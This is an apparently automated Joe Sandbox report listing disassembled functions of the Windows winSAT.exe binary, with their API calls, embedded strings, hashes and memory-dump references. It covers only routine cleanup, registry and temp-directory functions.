                                                                                                                                                                                              • Instruction ID: 3f17553e01c083db53c98a87b7a0eb64a4ffeb302e8207e9837a8d53a7ce1f13
                                                                                                                                                                                              • Opcode Fuzzy Hash: afa961589de5e33d04434e724ff52634cb44c442c321d86f7789c82287e94371
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D614E31A08A12D6F710EB60E8512BDBB60FB85724FE09235DA5E427E4DF7CE549C760
                                                                                                                                                                                              Function 00007FF780F9EB1E Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$ConsoleCtrlDirectoryFreeHandlerLibraryRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: cannot initialize handle streams$PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 2553899580-1836256727
                                                                                                                                                                                              • Opcode ID: 6dd3e8e8871fcca93b9664c5a0c3ca0b7b4fe5ba815eb1cd987d9de4614bc6fd
                                                                                                                                                                                              • Instruction ID: eba0fefe5323edecd7f6951bcc654dc0ed99d607fbc7df323768df9b37322008
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dd3e8e8871fcca93b9664c5a0c3ca0b7b4fe5ba815eb1cd987d9de4614bc6fd
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE713D60E0D64295FB60BB11F8502BAEB50BF85758FF89035D94E027E5CEADF454CB60
                                                                                                                                                                                              Function 00007FF780F9F937 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 183COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$ConsoleCountCtrlCurrentErrorHandlerLastProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$Main watch dog timer set to %4.1f seconds$PrivateError2$Watch dog timer is suppressed for a formal assessment$A#
                                                                                                                                                                                              • API String ID: 517596069-635825929
                                                                                                                                                                                              • Opcode ID: e9b66c82e45d1c1e17c8ffc869f7171ab270f1baad254f848c89b763af1bdd77
                                                                                                                                                                                              • Instruction ID: 9d5e768e4966704a50f72b56763f842e64822effccb221b6a0b3663842198185
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9b66c82e45d1c1e17c8ffc869f7171ab270f1baad254f848c89b763af1bdd77
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF91A021E0D68395FB60BB21B8502BAEB50BF85784FF89135D54D027E6DEACF454C760
                                                                                                                                                                                              Function 00007FF780F9F87E Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 182COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ConsoleCtrlErrorHandlerLast
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$Main watch dog timer set to %4.1f seconds$PrivateError2$Watch dog timer is suppressed for a formal assessment$A#
                                                                                                                                                                                              • API String ID: 3113525192-635825929
                                                                                                                                                                                              • Opcode ID: 17f45fea3c477a3833a80e4da517990659cdc73acfab8a626d9da7683711fb8e
                                                                                                                                                                                              • Instruction ID: cf69efc1be32597f0da7506474621d105dd6e25b08f79bae8fce35835e400b13
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17f45fea3c477a3833a80e4da517990659cdc73acfab8a626d9da7683711fb8e
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8918161E0D68395FB60BB11B8512BAEB50BF85784FF89035D54D027E6CEADF454C720
                                                                                                                                                                                              Function 00007FF780F9EE16 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 146synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNEL32 ref: 00007FF780FA0521
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FA0531
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00007FF780FA05BC
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE ref: 00007FF780FA05D1
                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF780FA0671
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF780FA0684
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B07
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B23
                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF780FA0B41
                                                                                                                                                                                                • Part of subcall function 00007FF780FA8A40: GetStringTypeExW.KERNEL32 ref: 00007FF780FA8A8A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegOpenKeyExW.KERNELBASE ref: 00007FF780FDB25C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB29D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB2EE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegOpenKeyExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB352
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegSetValueExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB389
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegCloseKey.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB39F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$EnabledEventExceptionHandleOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexProcessQueryReleaseRemoveSizeofStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $ERROR: user does not have admin rights$PrivateError2$A#
                                                                                                                                                                                              • API String ID: 111406061-1341529956
                                                                                                                                                                                              • Opcode ID: c4fc51e546261cf886874d46cdc260991f628b714db9c0479af4ea7d99a7cc87
                                                                                                                                                                                              • Instruction ID: 3fb5d7dd92845651bfe2c1ad162d325ba46d21f225d1928fe9d88c1234673c16
                                                                                                                                                                                              • Opcode Fuzzy Hash: c4fc51e546261cf886874d46cdc260991f628b714db9c0479af4ea7d99a7cc87
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C716F60E0D64395FB60BB11F8502BAEB50BF85788FF49035D94D027E6CEADB454CB60
                                                                                                                                                                                              Function 00007FF780F9EBA5 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 143synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNEL32 ref: 00007FF780FA0521
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FA0531
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00007FF780FA05BC
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE ref: 00007FF780FA05D1
                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF780FA0671
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF780FA0684
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B07
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B23
                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF780FA0B41
                                                                                                                                                                                                • Part of subcall function 00007FF780FA8A40: GetStringTypeExW.KERNEL32 ref: 00007FF780FA8A8A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegOpenKeyExW.KERNELBASE ref: 00007FF780FDB25C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB29D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB2EE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegOpenKeyExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB352
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegSetValueExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB389
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegCloseKey.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB39F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$base\winsat\exe\main.cpp$A#
                                                                                                                                                                                              • API String ID: 568634108-2035168892
                                                                                                                                                                                              • Opcode ID: 5b44d8bc7320c3f65f7ebdfa15a1ea92a2b842721bc89c34c64084f1288bf5f3
                                                                                                                                                                                              • Instruction ID: 85ff0dde5a2c1aacf2fd228c149adaacd698421396f526f4ab912ffcb5aa7629
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b44d8bc7320c3f65f7ebdfa15a1ea92a2b842721bc89c34c64084f1288bf5f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04716D60E0D64395FB60BB11F8502BAEB50BF85788FF89035D94E027E6DEADB454CB60
                                                                                                                                                                                              Function 00007FF780F9F042 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 137synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cannot process the command line$Cleanup and exit$ERROR: $PrivateError2$A#
                                                                                                                                                                                              • API String ID: 3961399675-4074399028
                                                                                                                                                                                              • Opcode ID: e3eef2f8cf22f96087c1aa5aeeb78a44921e2bf7882242dc61fbf64b7d77f375
                                                                                                                                                                                              • Instruction ID: b7aece9e0e32a323284f2877459c0652e36fcb842e7da6354a3f947f05f4350e
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3eef2f8cf22f96087c1aa5aeeb78a44921e2bf7882242dc61fbf64b7d77f375
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A615B60E0D64395FB60BB11F8502BAEB50BF85788FF8A035D54E027E6DEADB454CB60
                                                                                                                                                                                              Function 00007FF780F9E767 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreatePath$AppendDirectoryStringUuid$EnvironmentErrorFreeLastTempVariable
                                                                                                                                                                                              • String ID: TMP$WinSAT
                                                                                                                                                                                              • API String ID: 1439655995-2813497950
                                                                                                                                                                                              • Opcode ID: bf8d1708ef15fce640154c456c56d2c4e118b59af927710beb8304350b9fbf7b
                                                                                                                                                                                              • Instruction ID: ad4cd6eab8dabea64f71c1b548da2f67ad577278d64df6b81f778db42f0bdccf
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf8d1708ef15fce640154c456c56d2c4e118b59af927710beb8304350b9fbf7b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541563660CA82D6EB50AB51E8842BEFB61FB85755FE0D031D64E436A8DF7CE449CB10
                                                                                                                                                                                              Function 00007FF780F9EC30 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 142synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                              • SetConsoleCtrlHandler.KERNEL32 ref: 00007FF780FA0521
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FA0531
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00007FF780FA05BC
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE ref: 00007FF780FA05D1
                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF780FA0671
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF780FA0684
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B07
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FA0B23
                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00007FF780FA0B41
                                                                                                                                                                                                • Part of subcall function 00007FF780FA8A40: GetStringTypeExW.KERNEL32 ref: 00007FF780FA8A8A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegOpenKeyExW.KERNELBASE ref: 00007FF780FDB25C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB29D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB218: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF780F99A08), ref: 00007FF780FDB2EE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegOpenKeyExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB352
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegSetValueExW.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB389
                                                                                                                                                                                                • Part of subcall function 00007FF780FDB318: RegCloseKey.ADVAPI32(?,?,?,?,001F0003,00007FF780FAE2AE), ref: 00007FF780FDB39F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$Close$ExceptionHandleOpenThrowValue$ConsoleCtrlDirectoryErrorFindFreeHandlerLastLibraryLoadLockModuleMutexQueryReleaseRemoveSizeofStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: $PrivateError2$A#
                                                                                                                                                                                              • API String ID: 568634108-3205933662
                                                                                                                                                                                              • Opcode ID: 80feabcce4113e0c7242cd8f08c18fc0410cd75c9732d9c740b057425dfb8398
                                                                                                                                                                                              • Instruction ID: 41f9303fea11e08f8b0f61310dadd176dab2bcac367c636d48f430aef02ce605
                                                                                                                                                                                              • Opcode Fuzzy Hash: 80feabcce4113e0c7242cd8f08c18fc0410cd75c9732d9c740b057425dfb8398
                                                                                                                                                                                              • Instruction Fuzzy Hash: 47716D60E0D64395FB60BB11F8502BAEB50BF85788FF89035D94E027E6CEADB454CB60
                                                                                                                                                                                              Function 00007FF780F9EBEF Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 139synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
